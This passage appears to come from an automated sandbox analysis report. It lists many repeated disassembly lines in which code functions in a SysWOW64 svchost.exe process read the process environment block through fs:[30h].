Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]	1_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]	1_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]	1_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]	1_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]	1_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]	1_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]	1_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]	1_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]	1_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]	1_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]	1_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]	1_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]	1_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]	1_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]	1_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]	1_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]	1_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]	1_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]	1_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]	1_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]	1_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]	1_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]	1_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]	1_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]	1_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]	1_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]	1_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]	1_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]	1_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]	1_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]	1_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]	1_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]	1_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]	1_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]	1_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]	1_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]	1_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]	1_2_03028B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]	1_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]	1_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]	1_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]	1_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]	1_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]	1_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]	1_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]	1_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]	1_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]	1_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]	1_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]	1_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]	1_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]	1_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]	1_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]	1_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]	1_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]	1_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]	1_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]	1_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]	1_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]	1_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]	1_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]	1_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]	1_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]	1_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]	1_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]	1_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]	1_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]	1_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]	1_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]	1_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]	1_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104940 mov eax, dword ptr fs:[00000030h]	1_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov edx, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]	1_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]	1_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]	1_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]	1_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]	1_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]	1_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]	1_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_030BE9E0
